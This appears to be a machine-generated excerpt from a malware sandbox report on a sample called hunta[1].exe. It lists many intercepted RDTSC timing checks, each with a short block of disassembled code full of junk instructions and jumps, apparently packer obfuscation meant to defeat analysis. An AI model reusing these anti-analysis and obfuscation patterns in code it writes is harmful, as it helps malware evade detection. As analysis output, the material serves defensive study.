Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 5970237 second address: 5970275 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, cx 0x00000006 mov eax, 00CC3F9Bh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e and dword ptr [eax], 00000000h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 movsx edx, si 0x00000017 pushfd 0x00000018 jmp 00007FF2E5514DF4h 0x0000001d sbb cx, F998h 0x00000022 jmp 00007FF2E5514DEBh 0x00000027 popfd 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 5970275 second address: 5970299 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 5970299 second address: 597029D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 597029D second address: 59702B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C2Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 593001E second address: 5930024 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 5930024 second address: 5930056 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, ecx 0x00000005 mov si, F9AFh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebp 0x0000000d jmp 00007FF2E55A2C32h 0x00000012 push eax 0x00000013 jmp 00007FF2E55A2C2Bh 0x00000018 xchg eax, ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 5930056 second address: 5930071 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DF7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 5930071 second address: 5930089 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF2E55A2C34h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 5930089 second address: 593008D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 593008D second address: 59300D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b pushad 0x0000000c mov ebx, 18AD75AEh 0x00000011 push ebx 0x00000012 pop ecx 0x00000013 popad 0x00000014 pushfd 0x00000015 jmp 00007FF2E55A2C2Bh 0x0000001a and esi, 23B8A65Eh 0x00000020 jmp 00007FF2E55A2C39h 0x00000025 popfd 0x00000026 popad 0x00000027 and esp, FFFFFFF8h 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 59300D7 second address: 59300DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 59300DB second address: 59300DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 59300DF second address: 59300E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 59300E5 second address: 5930129 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF2E55A2C37h 0x00000009 sbb si, E11Eh 0x0000000e jmp 00007FF2E55A2C39h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 5930129 second address: 593012D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 593012D second address: 5930131 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 5930131 second address: 5930137 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 5930137 second address: 593013D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 593013D second address: 5930156 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 5930156 second address: 593015A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 593015A second address: 5930160 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 5930160 second address: 5930166 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 5930166 second address: 593020B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ecx 0x00000009 jmp 00007FF2E5514DEDh 0x0000000e xchg eax, ebx 0x0000000f pushad 0x00000010 mov ecx, 5CA77E43h 0x00000015 mov dl, ch 0x00000017 popad 0x00000018 push eax 0x00000019 jmp 00007FF2E5514DF2h 0x0000001e xchg eax, ebx 0x0000001f jmp 00007FF2E5514DF0h 0x00000024 mov ebx, dword ptr [ebp+10h] 0x00000027 pushad 0x00000028 jmp 00007FF2E5514DEEh 0x0000002d mov ah, 1Dh 0x0000002f popad 0x00000030 push ebx 0x00000031 jmp 00007FF2E5514DEAh 0x00000036 mov dword ptr [esp], esi 0x00000039 jmp 00007FF2E5514DF0h 0x0000003e mov esi, dword ptr [ebp+08h] 0x00000041 jmp 00007FF2E5514DF0h 0x00000046 xchg eax, edi 0x00000047 jmp 00007FF2E5514DF0h 0x0000004c push eax 0x0000004d push eax 0x0000004e push edx 0x0000004f pushad 0x00000050 mov eax, 5FF38DC3h 0x00000055 popad 0x00000056 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 593020B second address: 593022D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C35h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a pushad 0x0000000b mov bx, si 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 593022D second address: 5930289 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FF2E5514DF4h 0x00000008 sub ax, 1EE8h 0x0000000d jmp 00007FF2E5514DEBh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 test esi, esi 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007FF2E5514DF4h 0x0000001f jmp 00007FF2E5514DF5h 0x00000024 popfd 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 5930289 second address: 59302DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 je 00007FF357310FACh 0x0000000c pushad 0x0000000d mov dx, ax 0x00000010 pushfd 0x00000011 jmp 00007FF2E55A2C32h 0x00000016 and ch, FFFFFFD8h 0x00000019 jmp 00007FF2E55A2C2Bh 0x0000001e popfd 0x0000001f popad 0x00000020 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FF2E55A2C35h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 59302DA second address: 59302DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 59302DF second address: 5930368 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 je 00007FF357310F6Bh 0x0000000d jmp 00007FF2E55A2C36h 0x00000012 mov edx, dword ptr [esi+44h] 0x00000015 jmp 00007FF2E55A2C30h 0x0000001a or edx, dword ptr [ebp+0Ch] 0x0000001d jmp 00007FF2E55A2C30h 0x00000022 test edx, 61000000h 0x00000028 pushad 0x00000029 mov al, C3h 0x0000002b call 00007FF2E55A2C33h 0x00000030 movzx esi, dx 0x00000033 pop edi 0x00000034 popad 0x00000035 jne 00007FF357310F65h 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007FF2E55A2C37h 0x00000042 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 5930368 second address: 593036F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 593036F second address: 5930381 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 test byte ptr [esi+48h], 00000001h 0x0000000b pushad 0x0000000c mov eax, edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 5940044 second address: 5940093 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF2E5514DF5h 0x00000009 sbb ax, 4636h 0x0000000e jmp 00007FF2E5514DF1h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 jmp 00007FF2E5514DECh 0x0000001d xchg eax, ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FF2E5514DEAh 0x00000027 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 5940093 second address: 5940097 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 5940097 second address: 594009D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 594009D second address: 59400AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF2E55A2C2Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 59400AE second address: 59400D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF2E5514DF8h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 59400D2 second address: 5940112 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF2E55A2C31h 0x00000008 mov ebx, ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d and esp, FFFFFFF8h 0x00000010 jmp 00007FF2E55A2C2Ah 0x00000015 xchg eax, ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FF2E55A2C37h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 5940112 second address: 5940118 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 5940118 second address: 594011C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 594011C second address: 59401BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FF2E5514DEEh 0x0000000e xchg eax, ebx 0x0000000f pushad 0x00000010 mov di, cx 0x00000013 pushad 0x00000014 movzx ecx, bx 0x00000017 popad 0x00000018 popad 0x00000019 push edx 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007FF2E5514DEAh 0x00000021 and ecx, 471E2068h 0x00000027 jmp 00007FF2E5514DEBh 0x0000002c popfd 0x0000002d mov edx, esi 0x0000002f popad 0x00000030 mov dword ptr [esp], esi 0x00000033 pushad 0x00000034 push ecx 0x00000035 jmp 00007FF2E5514DF7h 0x0000003a pop esi 0x0000003b mov bh, BDh 0x0000003d popad 0x0000003e mov esi, dword ptr [ebp+08h] 0x00000041 pushad 0x00000042 movzx esi, di 0x00000045 call 00007FF2E5514DF3h 0x0000004a push eax 0x0000004b pop edx 0x0000004c pop eax 0x0000004d popad 0x0000004e mov ebx, 00000000h 0x00000053 push eax 0x00000054 push edx 0x00000055 jmp 00007FF2E5514DF7h 0x0000005a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 59401BC second address: 59401C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 59401C2 second address: 594025E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a pushad 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FF2E5514DF3h 0x00000012 add eax, 5990747Eh 0x00000018 jmp 00007FF2E5514DF9h 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007FF2E5514DF0h 0x00000024 jmp 00007FF2E5514DF5h 0x00000029 popfd 0x0000002a popad 0x0000002b jmp 00007FF2E5514DF0h 0x00000030 popad 0x00000031 je 00007FF35726AF39h 0x00000037 jmp 00007FF2E5514DF0h 0x0000003c cmp dword ptr [esi+08h], DDEEDDEEh 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 594025E second address: 5940262 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 5940262 second address: 5940266 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 5940266 second address: 594026C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 594026C second address: 59402E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FF2E5514DF0h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ecx, esi 0x0000000f jmp 00007FF2E5514DF0h 0x00000014 je 00007FF35726AEF3h 0x0000001a jmp 00007FF2E5514DF0h 0x0000001f test byte ptr [77726968h], 00000002h 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 mov si, di 0x0000002c pushfd 0x0000002d jmp 00007FF2E5514DF9h 0x00000032 jmp 00007FF2E5514DEBh 0x00000037 popfd 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 59402E0 second address: 59402F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF2E55A2C34h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 59402F8 second address: 59402FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 59402FC second address: 5940340 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007FF3572F8CD8h 0x0000000e pushad 0x0000000f jmp 00007FF2E55A2C38h 0x00000014 popad 0x00000015 mov edx, dword ptr [ebp+0Ch] 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FF2E55A2C37h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 5940340 second address: 59403FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FF2E5514DECh 0x00000011 or ax, 31A8h 0x00000016 jmp 00007FF2E5514DEBh 0x0000001b popfd 0x0000001c mov ah, 60h 0x0000001e popad 0x0000001f push eax 0x00000020 pushad 0x00000021 call 00007FF2E5514DF0h 0x00000026 pushad 0x00000027 popad 0x00000028 pop ecx 0x00000029 mov dx, F8B4h 0x0000002d popad 0x0000002e xchg eax, ebx 0x0000002f pushad 0x00000030 push edi 0x00000031 pop edx 0x00000032 mov dx, ax 0x00000035 popad 0x00000036 xchg eax, ebx 0x00000037 pushad 0x00000038 pushfd 0x00000039 jmp 00007FF2E5514DF8h 0x0000003e or al, FFFFFF98h 0x00000041 jmp 00007FF2E5514DEBh 0x00000046 popfd 0x00000047 pushfd 0x00000048 jmp 00007FF2E5514DF8h 0x0000004d adc al, FFFFFFF8h 0x00000050 jmp 00007FF2E5514DEBh 0x00000055 popfd 0x00000056 popad 0x00000057 push eax 0x00000058 push eax 0x00000059 push edx 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 59403FC second address: 5940400 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 5940400 second address: 5940412 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DEEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 5940412 second address: 5940429 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 77954804h 0x00000008 push edi 0x00000009 pop esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov di, ax 0x00000014 mov bl, ch 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 5940429 second address: 5940463 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DF6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+14h] 0x0000000c pushad 0x0000000d movzx ecx, dx 0x00000010 mov bh, 4Ah 0x00000012 popad 0x00000013 push dword ptr [ebp+10h] 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FF2E5514DF1h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 5940463 second address: 5940473 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF2E55A2C2Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 59A1952 second address: 59A1984 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF2E5514DF8h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 59A1984 second address: 59A1993 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 59A1993 second address: 59A199B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, si 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 59A199B second address: 59A19AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FF2E55A2C2Ah 0x0000000f rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 59A19AF second address: 59A19E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 10303324h 0x00000008 mov ecx, edi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FF2E5514DF0h 0x00000017 or cl, FFFFFFD8h 0x0000001a jmp 00007FF2E5514DEBh 0x0000001f popfd 0x00000020 mov bx, cx 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 59A19E4 second address: 59A1A40 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C35h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c call 00007FF2E55A2C2Ch 0x00000011 push esi 0x00000012 pop edx 0x00000013 pop eax 0x00000014 jmp 00007FF2E55A2C37h 0x00000019 popad 0x0000001a push 0000007Fh 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FF2E55A2C35h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 59A1AC4 second address: 59A1ACA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 59A1ACA second address: 59A1952 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C2Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a jmp 00007FF2E55A2C30h 0x0000000f retn 0004h 0x00000012 lea eax, dword ptr [ebp-10h] 0x00000015 push eax 0x00000016 call ebx 0x00000018 mov edi, edi 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FF2E55A2C35h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 5940687 second address: 5940696 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 5940696 second address: 594069C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 594069C second address: 59406BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF2E5514DF3h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 59406BA second address: 5940735 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF2E55A2C2Fh 0x00000009 xor ah, 0000002Eh 0x0000000c jmp 00007FF2E55A2C39h 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007FF2E55A2C30h 0x00000018 and cl, FFFFFFA8h 0x0000001b jmp 00007FF2E55A2C2Bh 0x00000020 popfd 0x00000021 popad 0x00000022 pop edx 0x00000023 pop eax 0x00000024 mov dword ptr [esp], ebp 0x00000027 jmp 00007FF2E55A2C36h 0x0000002c mov ebp, esp 0x0000002e pushad 0x0000002f mov di, 0520h 0x00000033 popad 0x00000034 pop ebp 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 5940735 second address: 5940739 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 5940739 second address: 594073F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 59C002F second address: 59C0035 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 59C0035 second address: 59C003B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 59C003B second address: 59C003F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 59C003F second address: 59C004E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 59C004E second address: 59C0052 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
